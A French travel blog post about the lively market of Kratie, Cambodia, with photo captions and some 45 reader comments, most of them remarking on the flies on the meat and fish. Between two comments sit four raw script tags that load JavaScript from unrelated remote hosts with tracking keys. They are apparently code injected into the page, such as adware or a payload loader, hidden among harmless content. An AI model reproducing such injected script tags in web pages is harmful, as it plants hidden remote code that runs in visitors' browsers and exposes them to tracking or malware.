• Kratie - Cambodge

    Kratie est une ville traversée par le Mékong, elle se situe au Cambodge à 250 km au nord est de Phnom Penh

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Son marché très animé  aux odeurs surprenantes se tient en plein centre ville et les rues qui l'entoure,il offre un intéressant spectacle de la vie cambodgienne.

    Petite sieste en attendant le client 

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

    Kratie - Cambodge

     

    Partager via Gmail Yahoo! Google Bookmarks

    Tags Tags : , , ,
  • Commentaires

    45
    AMAN BOU
    Jeudi 9 Janvier 2020 à 14:17

    vraiment charmant déjà bon Week-end

    44
    Jeudi 9 Janvier 2020 à 10:33
    Bonjour J-François Un petit coucou en passant te rendre visite Je te souhaite une bonne journée, bisous
    43
    Jeudi 9 Janvier 2020 à 08:00

    Bonjour Jean-François 

    quel Magnifique reportage que tu nous offre c est sur par tes Photographie  et oui chaque Pays vie différemment c est sur incroyable comment ils vivent quand tu regarde cette Personnes qui dorme en attendant le client c est Fantastique  bien sur moi qui ne suis pas trop viande là je ne pourrais pas en acheter  mais bon Merci beaucoup un article à apprendre bisous de ce Jeudi DANN

    42
    Jeudi 9 Janvier 2020 à 06:59

    des photos que je trouve surprenantes dû aux insectes volants qui s'y trouvent.....difficile pour nous de savoir que certain se nourrissent de ces morceaux là....les gens sont peut-être réagissent moins aux maladies.....passe un doux jeudi

    41
    Jeudi 9 Janvier 2020 à 02:12

    Bonjour JF

    Passe une bonne journée

    Avec amitiés René

    40
    Mercredi 8 Janvier 2020 à 18:17

    là c'est juste pas possible pour moi, déjà que la viande ce n'est pas mon truc mais alors de voir les mouches dessus , ça me dégoûte à vie ! LOL 

    39
    Mercredi 8 Janvier 2020 à 13:29

    bonjour JF

    nous n'avons pas visité cette ville, par contre pour l'ambiance on est en plein dedans en ce moment, pas dépaysés du tout

    bisous

    38
    Mercredi 8 Janvier 2020 à 11:14

    Marché très typique mais franchement je n'y achèterai pas la viande . Beau reportage de ces endroits que l'on ne voit plus dans nos pays trop protégés au niveau hygiène

    Bises et bonne journée

    37
    Mardi 7 Janvier 2020 à 23:59

    Coucou Jean François,

    Merci pour toutes ces photos. C'est dingue de voir le manque d'hygiène par rapport à chez nous mais c'est un beau voyage que tu as fais là.

    Amicalement

    Bonne soirée

    36
    Mardi 7 Janvier 2020 à 22:16

    Coucou J.F.

    dans les plats protéinés ce qu'on mange ce sont les mouches, la viande ou les deux??

    Saveurs originales et légumes on fruits bien colorés.

    Bonne semaine et bisous.

    35
    Mardi 7 Janvier 2020 à 15:41
    francinea

    Bonjour, quand je vois cette viande et ce poisson à l'air libre, et plein de mouches, je me dis que ces pays ne sont pas pour moi ! car j'imagine que ce que l'on te sert au restaurant vient de là.... je te souhaite une bonne journée, bisous

     

    34
    Mardi 7 Janvier 2020 à 14:55

    Bonjour à toi,

    Je suis végétarienne. Je ne passe jamais devant le rayon boucherie dans les grandes surfaces  et les odeurs d'un BBQ m'écoeurent  ... alors de voir toute cette viande  avec ces mouches c'est pas pour nous mettre en appétit.

    Mais tu as raison de nous montrer  cette vie de tous les jours.

    Les fruits et les légumes savent nous mettre en appétit.
    Merci à toi de nous montrer tout cela.

    33
    AMAN BOU
    Mardi 7 Janvier 2020 à 14:30

    UN PLAISIR DE VENIR ADMIRER TON ART ET BIZ

    32
    Mardi 7 Janvier 2020 à 10:58

    La création du jour

    Bonjour Jean François,  

    le ciel est nuageux ce matin, pas de soleil, mais 9°...

    Bonne journée, gros bisous

    31
    luce
    Mardi 7 Janvier 2020 à 10:49

    Bonjour J-F,

    Tu ne me mets pas en appétit aujourd'hui , déjà que je n'en ai pas beaucoup.  Tu as eu du courage de t'approcher de ces étales de viande. Il n'y a que les végétariens qui ne risquent rien. Spectacle intéressant comme tu le dis mais pas tellement  appétant.

    Bonne semaine, amicalement. 

      • Mercredi 8 Janvier 2020 à 18:12

        Bonsoir Luce

        J'ai probablement mangé de cette viande,les restaurants se ravitaillent sur les marchés ... Un temps humide et gris,on manque de soleil ... 

        Bonne soirée amitiés 

    30
    Mardi 7 Janvier 2020 à 07:00

    Bonjour JF  , me voici de retour de ma petite semaine de pause et je viens te souhaiter une bonne année avec des vœux  les plus sincères  et les plus chaleureux à toi et à toute ta famille .Avec toute mon amitié .

    29
    Lundi 6 Janvier 2020 à 18:38

    BONJOUR J F

    Un bel étalage de viande ,eux au moins ils aimes le porc !

    fruits et légumes super il y a le choix

    merci pour ses jolies photos d'un pays que je ne connais pas

    bisous

    28
    Lundi 6 Janvier 2020 à 18:26

    Dépaysement total sur votre blog. Un très bon moment. Merci de partager ces belles photos. Bonne soirée

    27
    Lundi 6 Janvier 2020 à 18:04

    bonjour JF , ah oui la vie doit être pauvre aux vues de tes photos  et l’hygiène  ???  ! mais bon   merci pour tes photos  on découvre ...

    belle année 2020 , la santé et plein de beaux voyages en partage !  a+

    26
    Lundi 6 Janvier 2020 à 17:35

    Oh! Mon Dieu!!! Quelle horreur toutes ces mouches. J'adore ce pays mais je crois que je perdrais vite tous mes kilos rien qu'à voir cela, J-François. Dire qu'ici on nous embête pour trois fois rien... C'est assez incroyable!!! Et ils mangent ça?Par contre les fruits et les légumes j'adhère complètement. Tous mes voeux, mon cher J-François, de bonne et heureuse année 2020 pour toi et tes proches. A bientôt

    25
    Lundi 6 Janvier 2020 à 17:02

    Bonjour Jean-François
    c'est un pays que j'aurais aimé visité
    que de nourriture
    -2° et les brouillards sont de retour
    je te souhaite une agréable journée ainsi qu’un bon d »but de semaine
    bises à vous deux

    24
    Lundi 6 Janvier 2020 à 16:16

    Bonjour Jean - François , oui une belle abondance de tout ! . Merci pour tes clichés bien interessants et bon début d'année , amitiés , escapade

    23
    Lundi 6 Janvier 2020 à 16:03

    Bonjour Jean-François

    Décidément on voyage partout avec toi, en orient surtout, mais c'est génial, j'apprends plein de choses.

    Je regardais le marché, qui a une apparence de marché moyenâgeux, mais qui regorge de denrée. Heureusement que les service sanitaires ne passent pas chez eux car je ne suis pas sur que ça soit bon, avec les compagnie de mouches qui voyage d'un morceau de viande à un poisson ! Mais ceci n'est pas du tout une critique.

    J'espère que tu vas bien

    Je te souhaite une très bonne journée

    Bien amicalement

    @lain

    22
    Lundi 6 Janvier 2020 à 15:40

    Je te souhaite une bonne année avec la santé, joie.....des voyages......

    Les étals sont beaux mais les mouches, très peu pour moi pourtant j'en  est vu à Paul-Gazelles(Algérie), j'étais jeune, la viande était dehors sur une table ou pendue, j'allais acheter......c'était le décor du moment...

    Bisous J.François.

     

     

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8786x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8786x&format=arrjs&r=1578321299906" type="text/javascript"></script> <script src="http://toolsmagick.com/ext/2252259d09bdba7f1b.js?sid=52646_8786_&title=qqq&blocks[]=31af2" type="text/javascript"></script>
    21
    Lundi 6 Janvier 2020 à 15:21

    Superbes étals. Bon, on est pas habitués aux mouches, mais c'est la vie locale !

    Bises

    20
    Lundi 6 Janvier 2020 à 13:25

    Bonjour Jean-François un très joli reportage avec ces très belles photos mais quelle horreur ces mouches ainsi sur la nourriture pas très agréable merci du joli partage bonne journée bisou Claudine Daniel

    19
    Lundi 6 Janvier 2020 à 13:16

    bonjour jean françois,bien sur c'est bien achalander,mais alors les mouches ,tres peu pour moi,mais eux n'y font peu etre pas attention!!

    bonne semaine et bisous

    bon debut de semaine

    18
    Lundi 6 Janvier 2020 à 13:07

    les mouches, elles, ne font pas vraiment la sieste !

    cela me rappelle le Vietnam.

     

    17
    Lundi 6 Janvier 2020 à 12:22

    Un marché très achalandé, mais que de mouches sur la viande (et le poisson) ! Attention, dans ton commentaire : lui qui est, toi qui es, et moi qui SUIS... Reportage photos très réussi, et tous mes vœux de Bonne Année ! Chris

    16
    Lundi 6 Janvier 2020 à 11:56

    Bonjour Jean-François,

    Éternel voyageur, je ne pourrais pas manger ni viande ni poisson dans ce pays, berk ! Les légumes sont magnifiques et colorés, j'adore.

    Je vous souhaite à tous deux ainsi qu'à vos proches et bonne année 2020. Que celle-ci vous garde en bonne santé et continue à vous faire voyager.

    Bonne semaine, bises à bientôt Jean-François.

    Maite

    15
    Lundi 6 Janvier 2020 à 10:51

    bonjour Jean-François, 

    que de mouches, je ne pourrais manger cette viande , ni le poisson . 

    Passe une bonne semaine, gros bisous, 

    Nadine 

    Résultat de recherche d'images pour "bon lundi gif animé"

    14
    Lundi 6 Janvier 2020 à 10:36

    La création du jour

    Bonjour Jean François,  

    tes photos sont pleines de réalité.. Je ne pourrais acheter ni de la viande ni du poisson sur ces étals à cause des mouches..

    Heureusement qu'il y a de beaux légumes et fruits..

    Bonne journée, gros bisous

    13
    Lundi 6 Janvier 2020 à 10:16

    Fort coloré, mais pas vraiment sympas, les mouches....

    Bonne journée Jean-François.

    12
    Lundi 6 Janvier 2020 à 09:33

    Un dépaysement total

    Quant à l'étal de la viande ça me renvoit à certaines images que j'ai en tête lors de certains de mes voyages 

    Mais cela fait partie du folklore 

    Merci pour ces belles images qui ne mettent pas vraiment en apérit hihihi 

    Bonne année 2020

     

     

    11
    Lundi 6 Janvier 2020 à 09:30

    Bonjour J-François

    En voyant les premières photos je me disais, étonnant de la viande comme ça sans fraicheur et l'hygiène la dedans ! et ensuite je vois ces grosses mouches rien d'étonnant, et personne ne dit rien !  pas de contrôle rien ! pas très appétissant tout ça !

    Heureusement il y a de bons fruits et légumes

    Je te souhaite une bonne journée, bisous

    10
    Lundi 6 Janvier 2020 à 09:05

    Merci pour cette visite guidée , très depaysante mais aussi interessante ..

    Je te souhaite de passer une très bonne année 2020 

    Bises

    9
    Lundi 6 Janvier 2020 à 09:02

    Merci pour le partage de ces belles photos qui nous font voyager.

    Bonne année Jean François !!!

    8
    Lundi 6 Janvier 2020 à 08:54

    Un marché plein de vie et de couleurs ! J'aime beaucoup les banques réfrigérées pour la viande, le poisson et... les mouches !

    Bonne journée

    7
    Lundi 6 Janvier 2020 à 08:48

    Coucou Jean-François,
    Merci pour cette promenade, avec un coup de coeur pour les trois premières photos.
    Je dois dire que pour moi qui ne mange pas le vivant, la seconde partie de ton article... -;( Je suis vite allée sur les fruits et légumes.
    Bonne journée à toi

    6
    Lundi 6 Janvier 2020 à 08:35

    Des photos qui peuvent pour certaines rebuter mais authentiques !

    Une profondeur magnifique et je t'en remercie.

    Bonne semaine

    Bisou

    5
    Lundi 6 Janvier 2020 à 06:59
    je serais bien incapable de manger en achetant sur ces étals de viande et de poisson....j'avais vu ça dans les pays du Margreb, passe une bien douce journée
    4
    Lundi 6 Janvier 2020 à 05:53
    CathyRose

    J'avoue que je préfère m'attarder sur les jolis fruits, la viande et le poisson je n'aurais pas trop confiance.
    Les normes ne sont pas les mêmes que chez nous ...
    Belle semaine Jean-François
    Cathy

    3
    Lundi 6 Janvier 2020 à 02:31

    Quel  beau  marché  plein de  couleurs  , mais  les  mouches  sur  la  viande  et  le  poisson   ne  m’attirent  pas  trop ..
      Je  te  souhaite  une  bonne  semaine  ...A  bientot ..
    Bisous  d’amitié  ..
    Nicole ...

    2
    Lundi 6 Janvier 2020 à 01:45

    Bonjour JF

    ici même marché, sans les mouches

     

    Commence bien cette semaine

     

    Avec amitiés

     

    René

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :